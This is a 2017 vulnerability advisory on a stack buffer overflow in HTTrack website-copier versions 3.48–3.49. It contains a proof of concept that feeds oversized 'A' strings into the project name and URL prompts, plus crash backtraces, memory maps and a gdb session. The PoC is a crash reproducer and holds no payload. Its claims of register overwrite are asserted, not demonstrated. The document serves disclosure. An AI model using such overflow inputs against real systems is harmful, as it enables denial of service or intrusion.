HTTrack 3.x Stack Buffer Overflow
Posted on 24 May 2017
Document Title: =============== HTTrack v3.x - Stack Buffer Overflow Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2068 Release Date: ============= 2017-05-22 Vulnerability Laboratory ID (VL-ID): ==================================== 2068 Common Vulnerability Scoring System: ==================================== 6.1 Vulnerability Class: ==================== Buffer Overflow Product & Service Introduction: =============================== It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system. WinHTTrack is the Windows 2000/XP/Vista/Seven release of HTTrack, and WebHTTrack the Linux/Unix/BSD release. (Copy of the Homepage: http://www.httrack.com/ ) Abstract Advisory Information: ============================== An independent vulnerability laboratory researcher discovered a stack buffer overflow in the official HTTrack v3.48-22-1 (Fedora 25), v3.48-24 (Debian) & v3.49.1 (Windows). Vulnerability Disclosure Timeline: ================================== 2016-05-12: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) 2016-05-12: Vendor Notification (HTTrack Security Service Team) 2016-05-13: Vendor Response/Feedback (HTTrack Security Service Team) 2017-05-14: Vendor Fix/Patch (HTTrack Service Team) 2017-05-16: Security Acknowledgements (HTTrack Security Service Team) 2017-05-22: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Xavier Roche Product: HTTrack Website Copier - Software (Linux & Windows) 3.48-22-1 (Fedora 25), v3.48-24 (Debian), v3.49.1 (Windows) & Android App Exploitation Technique: ======================= Local Severity Level: =============== High Technical Details & Description: ================================ A local buffer overflow vulnerability has been discovered in the official HTTrack v3.48-22-1 (Fedora 25), v3.48-24 (Debian) & v3.49.1 (Windows). The vulnerability allows to overwrite the registers of the process to gain higher access privileges for compromise of the local computer system. A buffer overflow in the `URI` and `Project Name` processing in `HTTrack` and `WebHTTrack` on version 3.48-22-1 (Fedora 25) and 3.48-24(Debian), allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a large unicode strings. The vulnerability is a classic unicode stack buffer overflow vulnerability in the software core. The vulnerability can be exploited by local attackers with restricted system user privileges to compromise the software process to gain higher process access privileges. The issue allows to overwrite the basic registers of the process like eip and ebx. The security risk of the stack overflow vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.1. Exploitation of the stack buffer overflow vulnerability requires a low privilege or restricted system user account without user interaction. Successful exploitation of the stack overflow vulnerability results in process manipulation or compromise of the affected computer system. Proof of Concept (PoC): ======================= The stack buffer overflow vulnerability can be exploited by local attackers with low privileged system user account and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. --- Wizard Command Line HTTRACK --- AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -O "AAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -%v --- Backtrace --- *** buffer overflow detected ***: httrack terminated /lib/i386-linux-gnu/libc.so.6(+0x67f4a)[0xb7d7df4a] /lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x58)[0xb7e0fc78] /lib/i386-linux-gnu/libc.so.6(+0xf7ea8)[0xb7e0dea8] /lib/i386-linux-gnu/libc.so.6(+0xf749f)[0xb7e0d49f] /usr/lib/libhttrack.so.2(+0x4d301)[0xb7f3a301] /usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33] /usr/lib/libhttrack.so.2(hts_main+0x26)[0xb7f43b86] /usr/lib/libhttrack.so.2(+0x3e526)[0xb7f2b526] /usr/lib/libhttrack.so.2(+0x55555)[0xb7f42555] /usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33] httrack(+0x144b)[0x8000144b] /lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7d2e276] httrack(+0x152e)[0x8000152e] --- Memory Map --- 80000000-80005000 r-xp 00000000 08:01 1334296 /usr/bin/httrack 80005000-80006000 r--p 00004000 08:01 1334296 /usr/bin/httrack 80006000-80007000 rw-p 00005000 08:01 1334296 /usr/bin/httrack 80007000-80050000 rw-p 00000000 00:00 0 [heap] b79d7000-b79f3000 r-xp 00000000 08:01 917531 /lib/i386-linux-gnu/libgcc_s.so.1 b79f3000-b79f4000 r--p 0001b000 08:01 917531 /lib/i386-linux-gnu/libgcc_s.so.1 b79f4000-b79f5000 rw-p 0001c000 08:01 917531 /lib/i386-linux-gnu/libgcc_s.so.1 b79f5000-b7a3d000 rw-p 00000000 00:00 0 b7a3d000-b7a40000 r-xp 00000000 08:01 919065 /lib/i386-linux-gnu/libdl-2.24.so b7a40000-b7a41000 r--p 00002000 08:01 919065 /lib/i386-linux-gnu/libdl-2.24.so b7a41000-b7a42000 rw-p 00003000 08:01 919065 /lib/i386-linux-gnu/libdl-2.24.so b7a42000-b7aa9000 r-xp 00000000 08:01 1313651 /usr/lib/i386-linux-gnu/libssl.so.1.1 b7aa9000-b7aac000 r--p 00066000 08:01 1313651 /usr/lib/i386-linux-gnu/libssl.so.1.1 b7aac000-b7ab0000 rw-p 00069000 08:01 1313651 /usr/lib/i386-linux-gnu/libssl.so.1.1 b7ab0000-b7cfa000 r-xp 00000000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1 b7cfa000-b7cfb000 ---p 0024a000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1 b7cfb000-b7d0c000 r--p 0024a000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1 b7d0c000-b7d13000 rw-p 0025b000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1 b7d13000-b7d16000 rw-p 00000000 00:00 0 b7d16000-b7ec9000 r-xp 00000000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so b7ec9000-b7eca000 ---p 001b3000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so b7eca000-b7ecc000 r--p 001b3000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so b7ecc000-b7ecd000 rw-p 001b5000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so b7ecd000-b7ed0000 rw-p 00000000 00:00 0 b7ed0000-b7eeb000 r-xp 00000000 08:01 919220 /lib/i386-linux-gnu/libz.so.1.2.11 b7eeb000-b7eec000 r--p 0001a000 08:01 919220 /lib/i386-linux-gnu/libz.so.1.2.11 b7eec000-b7eed000 rw-p 0001b000 08:01 919220 /lib/i386-linux-gnu/libz.so.1.2.11 b7eed000-b7f96000 r-xp 00000000 08:01 1334283 /usr/lib/libhttrack.so.2.0.48 b7f96000-b7f97000 r--p 000a8000 08:01 1334283 /usr/lib/libhttrack.so.2.0.48 b7f97000-b7f99000 rw-p 000a9000 08:01 1334283 /usr/lib/libhttrack.so.2.0.48 b7f99000-b7fb2000 r-xp 00000000 08:01 919180 /lib/i386-linux-gnu/libpthread-2.24.so b7fb2000-b7fb3000 r--p 00018000 08:01 919180 /lib/i386-linux-gnu/libpthread-2.24.so b7fb3000-b7fb4000 rw-p 00019000 08:01 919180 /lib/i386-linux-gnu/libpthread-2.24.so b7fb4000-b7fb6000 rw-p 00000000 00:00 0 b7fd4000-b7fd7000 rw-p 00000000 00:00 0 b7fd7000-b7fd9000 r--p 00000000 00:00 0 [vvar] b7fd9000-b7fdb000 r-xp 00000000 00:00 0 [vdso] b7fdb000-b7ffd000 r-xp 00000000 08:01 919009 /lib/i386-linux-gnu/ld-2.24.so b7ffd000-b7ffe000 rw-p 00000000 00:00 0 b7ffe000-b7fff000 r--p 00022000 08:01 919009 /lib/i386-linux-gnu/ld-2.24.so b7fff000-b8000000 rw-p 00023000 08:01 919009 /lib/i386-linux-gnu/ld-2.24.so bffdf000-c0000000 rw-p 00000000 00:00 0 [stack] - Caught signal 6 httrack(+0x1de3)[0x80001de3] [0xb7fd9d04] [0xb7fd9cf9] /lib/i386-linux-gnu/libc.so.6(gsignal+0xb0)[0xb7d42050] /lib/i386-linux-gnu/libc.so.6(abort+0x157)[0xb7d43577] /lib/i386-linux-gnu/libc.so.6(+0x67f4f)[0xb7d7df4f] /lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x58)[0xb7e0fc78] /lib/i386-linux-gnu/libc.so.6(+0xf7ea8)[0xb7e0dea8] /lib/i386-linux-gnu/libc.so.6(+0xf749f)[0xb7e0d49f] /usr/lib/libhttrack.so.2(+0x4d301)[0xb7f3a301] /usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33] /usr/lib/libhttrack.so.2(hts_main+0x26)[0xb7f43b86] /usr/lib/libhttrack.so.2(+0x3e526)[0xb7f2b526] /usr/lib/libhttrack.so.2(+0x55555)[0xb7f42555] /usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33] httrack(+0x144b)[0x8000144b] /lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7d2e276] httrack(+0x152e)[0x8000152e] Please report the problem at http://forum.httrack.com Aborted (core dumped) -------------------- (gdb) run Starting program: /usr/bin/httrack [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1". Welcome to HTTrack Website Copier (Offline Browser) 3.48-24 Copyright (C) 1998-2016 Xavier Roche and other contributors To see the option list, enter a blank line or try httrack --help Enter project name :AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Base path (return=/home/constantine/websites/) : Enter URLs (separated by commas or blank spaces) :AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Action: (enter) 1 Mirror Web Site(s) 2 Mirror Web Site(s) with Wizard 3 Just Get Files Indicated 4 Mirror ALL links in URLs (Multiple Mirror) 5 Test Links In URLs (Bookmark Test) 0 Quit : : 1 Proxy (return=none) : You can define wildcards, like: -*.gif +www.*.com/*.zip -*img_*.zip Wildcards (return=none) : Additional options (return=none): ---> Wizard command line httrack --- AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA -O "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -%v --- Backtrace --- *** buffer overflow detected ***: /usr/bin/httrack terminated /lib/i386-linux-gnu/libc.so.6(+0x67f4a)[0xb7d7df4a] /lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x58)[0xb7e0fc78] /lib/i386-linux-gnu/libc.so.6(+0xf7ea8)[0xb7e0dea8] /lib/i386-linux-gnu/libc.so.6(+0xf749f)[0xb7e0d49f] /usr/lib/libhttrack.so.2(+0x4d301)[0xb7f3a301] /usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33] /usr/lib/libhttrack.so.2(hts_main+0x26)[0xb7f43b86] /usr/lib/libhttrack.so.2(+0x3e526)[0xb7f2b526] /usr/lib/libhttrack.so.2(+0x55555)[0xb7f42555] /usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33] /usr/bin/httrack(+0x144b)[0x8000144b] /lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7d2e276] /usr/bin/httrack(+0x152e)[0x8000152e] --- Memory map: --- 80000000-80005000 r-xp 00000000 08:01 1334296 /usr/bin/httrack 80005000-80006000 r--p 00004000 08:01 1334296 /usr/bin/httrack 80006000-80007000 rw-p 00005000 08:01 1334296 /usr/bin/httrack 80007000-80050000 rw-p 00000000 00:00 0 [heap] b79d7000-b79f3000 r-xp 00000000 08:01 917531 /lib/i386-linux-gnu/libgcc_s.so.1 b79f3000-b79f4000 r--p 0001b000 08:01 917531 /lib/i386-linux-gnu/libgcc_s.so.1 b79f4000-b79f5000 rw-p 0001c000 08:01 917531 /lib/i386-linux-gnu/libgcc_s.so.1 b79f5000-b7a3d000 rw-p 00000000 00:00 0 b7a3d000-b7a40000 r-xp 00000000 08:01 919065 /lib/i386-linux-gnu/libdl-2.24.so b7a40000-b7a41000 r--p 00002000 08:01 919065 /lib/i386-linux-gnu/libdl-2.24.so b7a41000-b7a42000 rw-p 00003000 08:01 919065 /lib/i386-linux-gnu/libdl-2.24.so b7a42000-b7aa9000 r-xp 00000000 08:01 1313651 /usr/lib/i386-linux-gnu/libssl.so.1.1 b7aa9000-b7aac000 r--p 00066000 08:01 1313651 /usr/lib/i386-linux-gnu/libssl.so.1.1 b7aac000-b7ab0000 rw-p 00069000 08:01 1313651 /usr/lib/i386-linux-gnu/libssl.so.1.1 b7ab0000-b7cfa000 r-xp 00000000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1 b7cfa000-b7cfb000 ---p 0024a000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1 b7cfb000-b7d0c000 r--p 0024a000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1 b7d0c000-b7d13000 rw-p 0025b000 08:01 1312883 /usr/lib/i386-linux-gnu/libcrypto.so.1.1 b7d13000-b7d16000 rw-p 00000000 00:00 0 b7d16000-b7ec9000 r-xp 00000000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so b7ec9000-b7eca000 ---p 001b3000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so b7eca000-b7ecc000 r--p 001b3000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so b7ecc000-b7ecd000 rw-p 001b5000 08:01 919039 /lib/i386-linux-gnu/libc-2.24.so b7ecd000-b7ed0000 rw-p 00000000 00:00 0 b7ed0000-b7eeb000 r-xp 00000000 08:01 919220 /lib/i386-linux-gnu/libz.so.1.2.11 b7eeb000-b7eec000 r--p 0001a000 08:01 919220 /lib/i386-linux-gnu/libz.so.1.2.11 b7eec000-b7eed000 rw-p 0001b000 08:01 919220 /lib/i386-linux-gnu/libz.so.1.2.11 b7eed000-b7f96000 r-xp 00000000 08:01 1334283 /usr/lib/libhttrack.so.2.0.48 b7f96000-b7f97000 r--p 000a8000 08:01 1334283 /usr/lib/libhttrack.so.2.0.48 b7f97000-b7f99000 rw-p 000a9000 08:01 1334283 /usr/lib/libhttrack.so.2.0.48 b7f99000-b7fb2000 r-xp 00000000 08:01 919180 /lib/i386-linux-gnu/libpthread-2.24.so b7fb2000-b7fb3000 r--p 00018000 08:01 919180 /lib/i386-linux-gnu/libpthread-2.24.so b7fb3000-b7fb4000 rw-p 00019000 08:01 919180 /lib/i386-linux-gnu/libpthread-2.24.so b7fb4000-b7fb6000 rw-p 00000000 00:00 0 b7fd4000-b7fd7000 rw-p 00000000 00:00 0 b7fd7000-b7fd9000 r--p 00000000 00:00 0 [vvar] b7fd9000-b7fdb000 r-xp 00000000 00:00 0 [vdso] b7fdb000-b7ffd000 r-xp 00000000 08:01 919009 /lib/i386-linux-gnu/ld-2.24.so b7ffd000-b7ffe000 rw-p 00000000 00:00 0 b7ffe000-b7fff000 r--p 00022000 08:01 919009 /lib/i386-linux-gnu/ld-2.24.so b7fff000-b8000000 rw-p 00023000 08:01 919009 /lib/i386-linux-gnu/ld-2.24.so bffdf000-c0000000 rw-p 00000000 00:00 0 [stack] Program received signal SIGABRT, Aborted. 0xb7fd9cf9 in __kernel_vsyscall () (gdb) continue Continuing. Caught signal 6 /usr/bin/httrack(+0x1de3)[0x80001de3] [0xb7fd9d04] [0xb7fd9cf9] /lib/i386-linux-gnu/libc.so.6(gsignal+0xb0)[0xb7d42050] /lib/i386-linux-gnu/libc.so.6(abort+0x157)[0xb7d43577] /lib/i386-linux-gnu/libc.so.6(+0x67f4f)[0xb7d7df4f] /lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x58)[0xb7e0fc78] /lib/i386-linux-gnu/libc.so.6(+0xf7ea8)[0xb7e0dea8] /lib/i386-linux-gnu/libc.so.6(+0xf749f)[0xb7e0d49f] /usr/lib/libhttrack.so.2(+0x4d301)[0xb7f3a301] /usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33] /usr/lib/libhttrack.so.2(hts_main+0x26)[0xb7f43b86] /usr/lib/libhttrack.so.2(+0x3e526)[0xb7f2b526] /usr/lib/libhttrack.so.2(+0x55555)[0xb7f42555] /usr/lib/libhttrack.so.2(hts_main2+0x43)[0xb7f43b33] /usr/bin/httrack(+0x144b)[0x8000144b] /lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7d2e276] /usr/bin/httrack(+0x152e)[0x8000152e] Please report the problem at http://forum.httrack.com Program received signal SIGABRT, Aborted. 0xb7fd9cf9 in __kernel_vsyscall () Solution - Fix & Patch: ======================= https://github.com/xroche/httrack/commit/d1dadb3f2ec3bb02f980974ca79ee66e5df34351 Note: A new 3.49.2 release has been submitted to Debian (sid), a new HTTrack version (WinHTTrack) and Android version. The Debian security team has been informed, and should take the backport side Security Risk: ============== The security risk of the local stack buffer overflow vulnerability in the software core is estimated as high (CVSS 6.1) Credits & Authors: ================== Hosein Askari (FarazPajohan) - hosein.askari@aol.com [https://www.vulnerability-lab.com/show.php?user=Hosein%20Askari] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright A(c) 2017 | Vulnerability Laboratory - [Evolution Security GmbH]aC/ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com